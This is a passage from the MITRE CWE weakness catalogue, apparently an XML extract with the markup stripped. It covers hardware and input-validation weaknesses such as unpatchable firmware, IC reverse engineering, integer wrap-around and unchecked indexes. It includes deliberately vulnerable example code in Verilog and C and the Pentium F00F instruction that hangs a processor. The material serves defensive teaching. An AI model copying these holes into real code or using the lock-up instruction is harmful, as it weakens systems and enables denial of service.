endmodule + + In the Verilog code below, the security level input to the TrustZone aware peripheral is correctly driven by an appropriate signal instead of being grounded. + + // Instantiation of IP in a parent system + module soc(...) + + ... + tz_peripheral u_tz_peripheral( + + .clk(clk), + .rst(rst), + .data_in(rdata), + // This port is no longer grounded, but instead driven by the appropriate signal + .data_in_security_level(rdata_security_level), + + ); + ... + + endmodule + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Nicole Fern + Tortuga Logic + 2020-05-22 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Hardware Block Incorrectly Connected to Larger System + + + + The product does not provide its + users with the ability to update or patch its + firmware to address any vulnerabilities or + weaknesses that may be present. + Without the ability to + patch or update firmware, consumers will be + left vulnerable to exploitation of any known + vulnerabilities, or any vulnerabilities that + are discovered in the future. This can expose + consumers to permanent risk throughout the + entire lifetime of the device, which could be + years or decades. Some external protective + measures and mitigations might be employed to + aid in preventing or reducing the risk of + malicious attack, but the root weakness cannot + be corrected. + + + + + + Primary + + + + + + + + + + + Requirements + Requirements development might not consider the importance of updates over the lifetime of the product, or might not choose the ability due to concerns such as expense or speed to market. + + + Architecture and Design + Lack of planning during architecture development and design, or external pressures such as speed to market, could ignore the capability to update. + + + Implementation + The weakness can appear through oversight during implementation. + + + + + Confidentiality + Integrity + Access Control + Authentication + Authorization + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + DoS: Crash, Exit, or Restart + Medium + If an attacker can identify an exploitable vulnerability in one device that has no means of patching, the attack may be used against an entire class of devices. + + + + + Manual Analysis + Create a new installable boot image of the current build with a minor version number change. Use the standard installation method to update the boot image. Verify that the minor version number has changed. Create a fake image. Verify that the boot updater will not install the fake image and generates an "invalid image" error message or equivalent. + High + + + Architecture or Design Review + Check the consumer or maintainer documentation, the architecture/design documentation, or the original requirements to ensure that the documentation includes details for how to update the firmware. + Moderate + + + Manual Dynamic Analysis + Determine if there is a lack of a capability to update read-only memory (ROM) structure. This could manifest as a difference between the latest firmware version and the current version within the device. + High + + + + + Requirements + Specify requirements to include the ability to update the firmware. Include integrity checks and authentication to ensure that untrusted firmware cannot be installed. + + + Architecture and Design + Design the device to allow for updating the firmware. Ensure that the design specifies how to distribute the updates and ensure their integrity and authentication. + + + Implementation + Implement the necessary functionality to allow the firmware to be updated. + + + + + A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes. + The refrigerator has no means of patching and is hacked becoming a spewer of email spam. + The device automatically patches itself and provides considerable more protection against being hacked. + + + + + CVE-2020-9054 + Chain: network-attached storage (NAS) device has a critical OS command injection (CWE-78) vulnerability that is actively exploited to place IoT devices into a botnet, but some products are "end-of-support" and cannot be patched (CWE-1277). [REF-1097] + https://www.cve.org/CVERecord?id=CVE-2020-9054 + + + [REF-1095] + A hardware "smart lock" has weak key generation that allows attackers to steal the key by BLE sniffing, but the device's firmware cannot be upgraded and hence remains vulnerable [REF-1095]. + https://www.theregister.com/2019/12/11/f_secure_keywe/ + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The "firmware" term does not have a single commonly-shared definition, so there may be variations in how this CWE entry is interpreted during mapping. + + + + Paul A. Wortman + Wells Fargo + 2020-05-13 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-12-10 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Common_Consequences, Description, Detection_Factors, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, References, Relationships, Terminology_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Detection_Factors, Observed_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Paul A. Wortman + Wells Fargo + 2021-10-12 + provided detection methods and observed examples + + + + + Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy. + + The physical structure of a device, viewed at high enough magnification, can reveal the information stored inside. Typical steps in IC reverse engineering involve removing the chip packaging (decapsulation) then using various imaging techniques ranging from high resolution x-ray microscopy to invasive techniques involving removing IC layers and imaging each layer using a scanning electron microscope. + The goal of such activities is to recover secret keys, unique device identifiers, and proprietary code and circuit designs embedded in hardware that the attacker has been unsuccessful at accessing through other means. These secrets may be stored in non-volatile memory or in the circuit netlist. Memory technologies such as masked ROM allow easier to extraction of secrets than One-time Programmable (OTP) memory. + + + + + + + + + + + + + Architecture and Design + + + + + Confidentiality + Varies by Context + A common goal of malicious actors who reverse engineer ICs is to produce and sell counterfeit versions of the IC. + + + + + Architecture and Design + The cost of secret extraction via IC reverse engineering should outweigh the potential value of the secrets being extracted. Threat model and value of secrets should be used to choose the technology used to safeguard those secrets. Examples include IC camouflaging and obfuscation, tamper-proof packaging, active shielding, and physical tampering detection information erasure. + + + + + Consider an SoC design that embeds a secret key in read-only memory (ROM). The key is baked into the design logic and may not be modified after fabrication causing the key to be identical for all devices. An attacker in possession of the IC can decapsulate and delayer the device. After imaging the layers, computer vision algorithms or manual inspection of the circuit features locate the ROM and reveal the value of the key bits as encoded in the visible circuit structure of the ROM. + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. It is more attack-oriented, so it might be more suited for CAPEC. + + + + Nicole Fern + Tortuga Logic + 2020-05-20 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result. + Many cryptographic hardware units depend upon other hardware units to supply information to them to produce a securely encrypted result. For example, a cryptographic unit that depends on an external random-number-generator (RNG) unit for entropy must wait until the RNG unit is producing random numbers. If a cryptographic unit retrieves a private encryption key from a fuse unit, the fuse unit must be up and running before a key may be supplied. + + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + The decision to continue using a cryptographic unit even though the input units to it are not producing valid data will compromise the encrypted result. + + + + + Access Control + Confidentiality + Integrity + Availability + Accountability + Authentication + Authorization + Non-Repudiation + Varies by Context + + + + + Architecture and Design + Best practices should be used to design cryptographic systems. + + + Implementation + Continuously ensuring that cryptographic inputs are supplying valid information is necessary to ensure that the encrypted output is secure. + + + + + + The following pseudocode illustrates the weak encryption resulting from the use of a pseudo-random-number generator output. + + If random_number_generator_self_test_passed() == TRUE + then Seed = get_random_number_from_RNG() + else Seed = hardcoded_number + + + In the example above, first a check of RNG ready is performed. If the check fails, the RNG is ignored and a hard coded value is used instead. The hard coded value severely weakens the encrypted output. + + If random_number_generator_self_test_passed() == TRUE + then Seed = get_random_number_from_RNG() + else enter_error_state() + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Cryptographic Primitives used without Successful Self-Test + + + + Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore "wraps around" to a very small, negative, or undefined value. + + + + + + + + Primary + + + + + + + + Due to how addition is performed by computers, if a primitive is incremented past the maximum value possible for its storage space, the system will not recognize this, and therefore increment each bit as if it still had extra space. Because of how negative numbers are represented in binary, primitives interpreted as signed may "wrap" to very large negative values. + + + + Implementation + + + Medium + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Instability + This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. + + + Integrity + Modify Memory + If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. + + + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. + + + + + Requirements specification: The choice could be made to use a language that is not susceptible to these issues. + + + Architecture and Design + Provide clear upper and lower bounds on the scale of any protocols designed. + + + Implementation + Perform validation on all incremented variables to ensure that they remain within reasonable bounds. + + + + + The following image processing code allocates a table for images. + + img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... + + This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). + + + + + Wrap-around error + + + MEM07-C + Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t + + + SFP1 + Glitch in computation + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The relationship between overflow and wrap-around needs to be examined more closely, since several entries (including CWE-190) are closely related. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Background_Details + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A product's hardware-based access control check occurs after the asset has been accessed. + + The product implements a hardware-based access control check. The asset should be accessible only after the check is successful. If, however, this operation is not atomic and the asset is accessed before the check is complete, the security of the system may be compromised. + + + + + + + + + + + + + + + + Implementation + + + + + Access Control + Confidentiality + Integrity + Modify Memory + Read Memory + Modify Application Data + Read Application Data + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + Implementation + Implement the access control check first. Access should only be given to asset if agent is authorized. + + + + + Assume that the module foo_bar implements a protected register. The register content is the asset. Only transactions made by user id (indicated by signal usr_id) 0x4 are allowed to modify the register contents. The signal grant_access is used to provide access. + + module foo_bar(data_out, usr_id, data_in, clk, rst_n); + output reg [7:0] data_out; + input wire [2:0] usr_id; + input wire [7:0] data_in; + input wire clk, rst_n; + wire grant_access; + always @ (posedge clk or negedge rst_n) + begin + + if (!rst_n) + + data_out = 0; + + else + + data_out = (grant_access) ? data_in : data_out; + assign grant_access = (usr_id == 3'h4) ? 1'b1 : 1'b0; + + + end + endmodule + + This code uses Verilog blocking assignments for data_out and grant_access. Therefore, these assignments happen sequentially (i.e., data_out is updated to new value first, and grant_access is updated the next cycle) and not in parallel. Therefore, the asset data_out is allowed to be modified even before the access control check is complete and grant_access signal is set. Since grant_access does not have a reset value, it will be meta-stable and will randomly go to either 0 or 1. + Flipping the order of the assignment of data_out and grant_access should solve the problem. The correct snippet of code is shown below. + + always @ (posedge clk or negedge rst_n) + begin + + if (!rst_n) + + data_out = 0; + + else + + assign grant_access = (usr_id == 3'h4) ? 1'b1 : 1'b0; + data_out = (grant_access) ? data_in : data_out; + + + end + endmodule + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed. + + If the instruction set architecture (ISA) and processor logic are not designed carefully and tested thoroughly, certain combinations of instructions may lead to locking the processor or other unexpected and undesirable behavior. Upon encountering unimplemented instruction opcodes or illegal instruction operands, the processor should throw an exception and carry on without negatively impacting security. However, specific combinations of legal and illegal instructions may cause unexpected behavior with security implications such as allowing unprivileged programs to completely lock the CPU. + + + + + + + + + + + + + + + Architecture and Design + Unexpected behavior from certain instruction combinations can arise from bugs in the ISA + + + Implementation + Unexpected behavior from certain instruction combinations can arise because of implementation details such as speculative execution, caching etc. + + + + + Integrity + Availability + Varies by Context + + + + + Testing + Implement a rigorous testing strategy that incorporates randomization to explore instruction sequences that are unlikely to appear in normal workloads in order to identify halt and catch fire instruction sequences. + + + Patching and Maintenance + Patch operating system to avoid running Halt and Catch Fire type sequences or to mitigate the damage caused by unexpected behavior. See [REF-1108]. + + + + + The Pentium F00F bug is a real-world example of how a sequence of instructions can lock a processor. The "cmpxchg8b" instruction compares contents of registers with a memory location. The operand is expected to be a memory location, but in the bad code snippet it is the eax register. Because the specified operand is illegal, an exception is generated, which is the correct behavior and not a security issue in itself. However, when prefixed with the "lock" instruction, the processor deadlocks because locked memory transactions require a read and write pair of transactions to occur before the lock on the memory bus is released. The exception causes a read to occur but there is no corresponding write, as there would have been if a legal operand had been supplied to the cmpxchg8b instruction. [REF-1331] + lock cmpxchg8b eax + + + The Cyrix Coma bug was capable of trapping a Cyrix 6x86, 6x86L, or 6x86MX processor in an infinite loop. An infinite loop on a processor is not necessarily an issue on its own, as interrupts could stop the loop. However, on select Cyrix processors, the x86 Assembly 'xchg' instruction was designed to prevent interrupts. On these processors, if the loop was such that a new 'xchg' instruction entered the instruction pipeline before the previous one exited, the processor would become deadlocked. [REF-1323] + + + The Motorola MC6800 microprocessor contained the first documented instance of a Halt and Catch Fire instruction - an instruction that causes the normal function of a processor to stop. If the MC6800 was given the opcode 0x9D or 0xDD, the processor would begin to read all memory very quickly, in sequence, and without executing any other instructions. This will cause the processor to become unresponsive to anything but a hard reset. [REF-1324] + + + The example code is taken from the commit stage inside the processor core of the HACK@DAC'19 buggy CVA6 SoC [REF-1342]. To ensure the correct execution of atomic instructions, the CPU must guarantee atomicity: no other device overwrites the memory location between the atomic read starts and the atomic write finishes. Another device may overwrite the memory location only before the read operation or after the write operation, but never between them, and finally, the content will still be consistent. + Atomicity is especially critical when the variable to be modified is a mutex, counting semaphore, or similar piece of data that controls access to shared resources. Failure to ensure atomicity may result in two processors accessing a shared resource simultaneously, permanent lock-up, or similar disastrous behavior + The following vulnerable code check for CSR interrupts and give them precedence over any other exception. However, the interrupts should not occur when the processor runs a series of atomic instructions. In the following vulnerable code, the required check must be included to ensure the processor is not in the middle of a series of atomic instructions. For more info, please check the Fixed code example. + + if (csr_exception_i.valid && csr_exception_i.cause[63] && commit_instr_i[0].fu != CSR) begin + + exception_o = csr_exception_i; + exception_o.tval = commit_instr_i[0].ex.tval; + + end + + + Refrain from interrupting if the intention is to commit an atomic instruction that should not be interrupted. This can be done by adding a condition to check whether the current committing instruction is atomic. [REF-1343] + + if (csr_exception_i.valid && csr_exception_i.cause[63] && !amo_valid_commit_o && commit_instr_i[0].fu != CSR) begin + + exception_o = csr_exception_i; + exception_o.tval = commit_instr_i[0].ex.tval; + + end + + + + + + + CVE-1999-1476 + A bug in some Intel Pentium processors allow DoS (hang) via an invalid "CMPXCHG8B" instruction, causing a deadlock + https://www.cve.org/CVERecord?id=CVE-1999-1476 + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Nicole Fern + Tortuga Logic + 2020-05-15 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Name, Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Description, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Demonstrative_Examples, Mapping_Notes, References + + + Shaza Zeitoni + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Mohamadreza Rostami + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Pouya Mahmoody + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Ahmad-Reza Sadeghi + Technical University of Darmstadt + 2023-06-21 + suggested demonstrative example + + + Rahul Kande + Texas A&M University + 2023-06-21 + suggested demonstrative example + + + Chen Chen + Texas A&M University + 2023-06-21 + suggested demonstrative example + + + Jeyavijayan Rajendran + Texas A&M University + 2023-06-21 + suggested demonstrative example + + Sequence of Processor Instructions Leads to Unexpected Behavior (Halt and Catch Fire) + + + + Immutable data, such as a first-stage bootloader, device identifiers, and "write-once" configuration settings are stored in writable memory that can be re-programmed or updated in the field. + + Security services such as secure boot, authentication of code and data, and device attestation all require assets such as the first stage bootloader, public keys, golden hash digests, etc. which are implicitly trusted. Storing these assets in read-only memory (ROM), fuses, or one-time programmable (OTP) memory provides strong integrity guarantees and provides a root of trust for securing the rest of the system. Security is lost if assets assumed to be immutable can be modified. + + + + + + + + + + + + + + Implementation + Keys, code, configuration settings, and other data should be programmed in write-once or read-only memory instead of writable memory. + + + + + Integrity + Varies by Context + + + + + Implementation + All immutable code or data should be programmed into ROM or write-once memory. + + + + + Cryptographic hash functions are commonly used to create unique fixed-length digests used to ensure the integrity of code and keys. A golden digest is stored on the device and compared to the digest computed from the data to be verified. If the digests match, the data has not been maliciously modified. If an attacker can modify the golden digest they then have the ability to store arbitrary data that passes the verification check. Hash digests used to verify public keys and early stage boot code should be immutable, with the strongest protection offered by hardware immutability. + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This entry is still under development and will continue to + see updates and content improvements. + + + As of CWE 4.3, CWE-1282 and CWE-1233 are being investigated + for potential duplication or overlap. + + + + + Nicole Fern + Tortuga Logic + 2020-05-15 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Name + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Assumed-Immutable Data Stored in Writable Memory + + + + The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary. + + A System-on-Chip (SoC) implements secure boot or verified boot. During this boot flow, the SoC often measures the code that it authenticates. The measurement is usually done by calculating the one-way hash of the code binary and extending it to the previous hash. The hashing algorithm should be a Secure One-Way hash function. The final hash, i.e., the value obtained after the completion of the boot flow, serves as the measurement data used in reporting or in attestation. The calculated hash is often stored in registers that can later be read by the party of interest to determine tampering of the boot flow. A common weakness is that the contents in these registers are modifiable by an adversary, thus spoofing the measurement. + + + + + + + + + + + + + Architecture and Design + Such issues can be introduced during hardware architecture or design and can be identified later during Testing or System Configuration phases. + + + Implementation + If the access-controls which protecting the reporting registers are misconfigured during implementation, this weakness can arise. + + + + + Confidentiality + Read Memory + Read Application Data + + + + + Architecture and Design + + Measurement data should be stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent. + + + + + + The SoC extends the hash and stores the results in registers. Without protection, an adversary can write their chosen hash values to these registers. Thus, the attacker controls the reported results. + + To prevent the above scenario, the registers should have one or more of the following properties: + + Should be Read-Only with respect to an adversary + Cannot be extended or modifiable either directly or indirectly (using a trusted agent as proxy) by an adversary + Should have appropriate access controls or protections + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still in development and will continue to see updates and content improvements. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-04-25 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties. + + Specified quantities include size, length, frequency, price, rate, number of operations, time, and others. Code may rely on specified quantities to allocate resources, perform calculations, control iteration, etc. When the quantity is not properly validated, then attackers can specify malicious quantities to cause excessive resource allocation, trigger unexpected failures, enable buffer overflows, etc. + + + + + + + + + + + + Implementation + + + + + Other + Varies by Context + Since quantities are used so often to affect resource allocation or process financial data, they are often present in many places in the code. + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + High + + + + + This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated. + + ...public static final double price = 20.00;int quantity = currentUser.getAttribute("quantity");double total = price * quantity;chargeUser(total);... + + The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited. + + + This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares. + + ...#define MAX_DIM 100... + /* board dimensions */ + + int m,n, error;board_square_t *board;printf("Please specify the board height: \n");error = scanf("%d", &m);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}printf("Please specify the board width: \n");error = scanf("%d", &n);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}if ( m > MAX_DIM || n > MAX_DIM ) {die("Value too large: Die evil hacker!\n");}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));... + + While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program. + + + + + CVE-2022-21668 + Chain: Python library does not limit the resources used to process images that specify a very large number of bands (CWE-1284), leading to excessive memory consumption (CWE-789) or an integer overflow (CWE-190). + https://www.cve.org/CVERecord?id=CVE-2022-21668 + + + CVE-2008-1440 + lack of validation of length field leads to infinite loop + https://www.cve.org/CVERecord?id=CVE-2008-1440 + + + CVE-2008-2374 + lack of validation of string length fields allows memory consumption or buffer over-read + https://www.cve.org/CVERecord?id=CVE-2008-2374 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-06-24 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product receives input that is expected to specify an index, position, or offset into an indexable resource such as a buffer or file, but it does not validate or incorrectly validates that the specified index/position/offset has the required properties. + + Often, indexable resources such as memory buffers or files can be accessed using a specific position, index, or offset, such as an index for an array or a position for a file. When untrusted input is not properly validated before it is used as an index, attackers could access (or attempt to access) unauthorized portions of these resources. This could be used to cause buffer overflows, excessive resource allocation, or trigger unexpected failures. + + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + High + + + + + The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index. + + + + /* capture the sizes of all messages */ + int getsizes(int sock, int count, int *sizes) { + ...char buf[BUFFER_SIZE];int ok;int num, size; + + // read values from socket and added to sizes array + while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ + + + // continue read from socket until buf only contains '.' + if (DOTLINE(buf))break; + else if (sscanf(buf, "%d %d", &num, &size) == 2)sizes[num - 1] = size; + + }... + + } + + In this example the message number retrieved from the buffer 